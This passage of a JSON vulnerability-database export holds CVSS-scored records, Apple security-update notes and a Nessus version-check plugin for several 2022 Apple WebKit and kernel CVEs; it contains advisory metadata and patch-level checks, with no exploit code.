"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:40:10", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 
Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-22587", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2023-10-07T00:00:00", "id": "AKB:F7DBB7CA-A582-4BC6-87C3-ACA4DBC4F58B", "href": "https://attackerkb.com/topics/ZFSs2HwdT4/cve-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "apple": [{"lastseen": "2023-11-27T15:22:54", "description": "# About the security content of Safari 15.3\n\nThis document describes the security content of Safari 15.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## Safari 15.3*\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: macOS Big Sur and macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\n* After installing this update, the build number for Safari 15.3 is 16612.4.9.1.8 on macOS Big Sur and 15612.4.9.1.8 on macOS Catalina.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of Safari 15.3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:02740BCB30C345C4CD19795FBD8FD739", "href": "https://support.apple.com/kb/HT213091", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T15:22:55", "description": "# About the security content of iOS 15.3.1 and iPadOS 15.3.1\n\nThis document describes the security content of iOS 15.3.1 and iPadOS 15.3.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iOS 15.3.1 and iPadOS 15.3.1\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 02, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of iOS 15.3.1 and iPadOS 15.3.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:52E627AE8868F50352A397AD32DB5373", "href": "https://support.apple.com/kb/HT213093", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T15:22:58", "description": "# About the security content of macOS Monterey 12.2.1\n\nThis document describes the security content of macOS Monterey 12.2.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## macOS Monterey 12.2.1\n\nReleased February 10, 2022\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22620: an anonymous researcher\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.2.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-10T00:00:00", "id": "APPLE:EF619761E522E15BAB653ACD81383CBF", "href": "https://support.apple.com/kb/HT213092", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-20T23:24:52", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. 
A website may be able to track sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-28T16:40:00", "id": "PRION:CVE-2022-22594", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-20T23:24:52", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 
Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-28T16:49:00", "id": "PRION:CVE-2022-22587", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-20T23:24:55", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "id": "PRION:CVE-2022-22620", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-11-27T14:24:43", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. 
A website may be able to track sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22594", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-28T16:40:00", "cpe": [], "id": "CVE-2022-22594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-11-27T14:24:46", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 
Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22587", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-28T16:49:00", "cpe": [], "id": "CVE-2022-22587", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-27T14:24:54", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22620", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "cpe": [], "id": "CVE-2022-22620", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "nessus": [{"lastseen": "2023-07-14T14:55:18", "description": "The remote SUSE Linux SLES12 / SLES_SAP12 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2022:0811-1 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8).\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. 
(CVE-2022-22620)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-12T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : webkit2gtk3 (SUSE-SU-2022:0811-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2023-07-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension-4_0", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2022-0811-1.NASL", "href": "https://www.tenable.com/plugins/nessus/158885", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:0811-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158885);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/14\");\n\n script_cve_id(\"CVE-2022-22620\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/25\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:0811-1\");\n\n script_name(english:\"SUSE SLES12 Security Update : webkit2gtk3 (SUSE-SU-2022:0811-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES12 / SLES_SAP12 host has packages installed that are affected by a vulnerability as referenced\nin the SUSE-SU-2022:0811-1 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8).\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited.. 
(CVE-2022-22620)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1196133\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22620\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-March/010419.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2c03dfe1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22620\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2-4_0\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12|SLES_SAP12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES12 / SLES_SAP12', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2|3|4|5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP12\" && (! preg(pattern:\"^(3|4|5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP12 SP3/4/5\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'3', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n 